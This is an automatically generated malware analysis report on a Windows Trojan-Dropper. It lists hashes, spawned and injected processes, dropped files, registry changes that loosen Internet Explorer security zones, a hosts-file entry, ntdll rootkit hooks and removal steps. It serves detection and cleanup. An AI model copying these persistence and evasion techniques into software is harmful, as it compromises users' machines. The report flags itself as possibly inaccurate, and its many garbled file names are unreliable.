Trojan-Dropper.Win32.Agent.exc (Kaspersky), Trojan.Crypt.CG (B) (Emsisoft), Trojan.Crypt.CG (AdAware), mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6ad50ea838fbe4371dd28acf92999eb0
SHA1: 73dd9b7a3b7123679b163bfa9b84cdd8924fc46b
SHA256: d19774911f2545e18c919a335d625a591fc0a9aa4873ea97c3efacacd3c9880c
SSDeep: 49152:4uui0zc7iTcTv1XsYIGjnFtuRB0m2HjZZgEB4lG3X/t:4Kiw74IQRBE4EB4Q3F
Size: 2494274 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: VideoPerformer
Created at: 2007-04-26 09:56:30
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
i.exe:1172
tqrl_90_4090.exe:1308
ws.exe:892
ignite.exe:428
ignite.exe:424
xtsszs_qn2.exe:540
SS540.exe:1688
%original file name%.exe:1660
xtsszs.exe:1484
The Trojan injects its code into the following process(es):
CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324
ignite.exe:432
mankind.exe:528
svhost.exe:628
DL.exe:1984
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process i.exe:1172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (0 bytes)
The process tqrl_90_4090.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÃÂÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-áÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Æßæ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-áѩתÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Àö¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýæ.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÃÂÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-áѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÃÂÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÃÂÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÃÂѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂÂÃâ€ÃƒÂ¶Ã‚±Â¸ÃÂü.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054ÃŽÃÂ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê áÓêתÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ã¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\success (0 bytes)
The process CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dm.dll (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
%System%\regsvr32.exe (300 bytes)
The process ws.exe:892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\svhost.exe (601 bytes)
The process ignite.exe:428 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\config\systemprofile\Local Settings\Temp\~DF8DF7.tmp (0 bytes)
The process ignite.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (26 bytes)
The process ignite.exe:424 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF76C2.tmp (0 bytes)
The process xtsszs_qn2.exe:540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp (0 bytes)
The process SS540.exe:1688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\sszs\uninst.exe (3082 bytes)
%Program Files%\sszs\xtsszsup.exe (8421 bytes)
%Program Files%\sszs\xtsszs.exe (7861 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
%Program Files%\sszs\xtsszs.dll (1568 bytes)
%Program Files%\sszs\mscomctl.ocx (21984 bytes)
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\å¸载系统瘦身助手.lnk (479 bytes)
%System%\diactss.dll (40 bytes)
%System%\netsh.exe (692 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\å¸载系统瘦身助手.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB9.tmp (0 bytes)
%Program Files%\sszs\xtsszs.dll (0 bytes)
The process %original file name%.exe:1660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe (17629 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\opeB3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opeB2.tmp (0 bytes)
The process svhost.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\lpk.dll (601 bytes)
C:\RCXBA.tmp (16516 bytes)
%System%\hra33.dll (7 bytes)
The Trojan deletes the following file(s):
%System%\hra33.dll (0 bytes)
The process xtsszs.exe:1484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~DF246.tmp (0 bytes)
The process DL.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[2].txt (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
Registry activity
The process CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 D5 6E 19 7D A4 9C 9B 8D 34 11 39 46 B7 C8 7A"
The process %original file name%.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 43 66 F2 15 A7 7E 3F C7 97 91 B1 6D DE DC 3D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"i.exe" = "i"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe" = "易è¯Â言程åºÂ"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 90f713db031604705052fa33d384d013 | c:\%original file name%.exe |
| ab8c30112e5118117354ffaccdb9b1b2 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace.dll |
| a87f0f76cdf059d9809f5401a81dcfc7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\Replace64.dll |
| 5e732d5af0370a56a94bc00fa9df3d2f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\ignite.exe |
| 2433e87f0896c200c62f39d9a3917e11 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\kindness.exe |
| 1b25f550a1c853b1cd221bc5ddf2f823 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\mankind.exe |
| 7146dfa1e6aaca5924c4626731f96b70 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\time.dll |
| ca1e89a61ecf3740067aff25920bb8ca | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uTray.exe |
| b5b674a71f910d38972fb8b940104083 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\tqrili\uninst.exe |
| 1ec9e3a5dd4525a9ee2b1ece8689be84 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7b0\DL.exe |
| dcb19b6333cc5227526c9b2cd9c82ffe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CF»Æ¹ÃøÊÓ¸¨Öúv5.6.exe |
| 4eb47ca672111bfd1e8cd09aef167992 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SOFTWARE.LOG |
| eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SS540.exe |
| 147127382e001f495d1842ee7a9e7912 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SkinH_EL.dll |
| 430f63435575980f70192c4602af8f0b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe |
| eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe |
| 6cee67311716bcacc2ea85e8bf422b63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe |
| a2206eb0d5510fc5fdbcf486ce2596a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\i.exe |
| 430f63435575980f70192c4602af8f0b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tqrl_90_4090.exe |
| eb6dba81f98d5c0ddff2104289ea7bd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\xtsszs_qn2.exe |
| 714cf24fc19a20ae0dc701b48ded2cf6 | c:\Program Files\sszs\mscomctl.ocx |
| e6d0ac8914358d21e3e5f89566c8ac3c | c:\Program Files\sszs\uninst.exe |
| b7b2fe0e404e4fbbc4a10657ac3ab4e3 | c:\Program Files\sszs\xtsszs.exe |
| c3f8abc1d2a6ff0ce3630f9d209e1213 | c:\Program Files\sszs\xtsszsup.exe |
| cb86a1cbb9e089277f5cfb06f0524e30 | c:\WINDOWS\system32\diactss.dll |
| e8889a55641fa57bcb588571f5bcbc63 | c:\WINDOWS\system32\dm.dll |
| b4428e0a216fb5fc063a77c3562ccd2d | c:\WINDOWS\system32\hra33.dll |
| 4eb47ca672111bfd1e8cd09aef167992 | c:\WINDOWS\system32\svhost.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 734 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | ZieF.pl |
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
i.exe:1172
tqrl_90_4090.exe:1308
ws.exe:892
ignite.exe:428
ignite.exe:424
xtsszs_qn2.exe:540
SS540.exe:1688
%original file name%.exe:1660
xtsszs.exe:1484 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\History\History.IE5\desktop.ini (159 bytes)
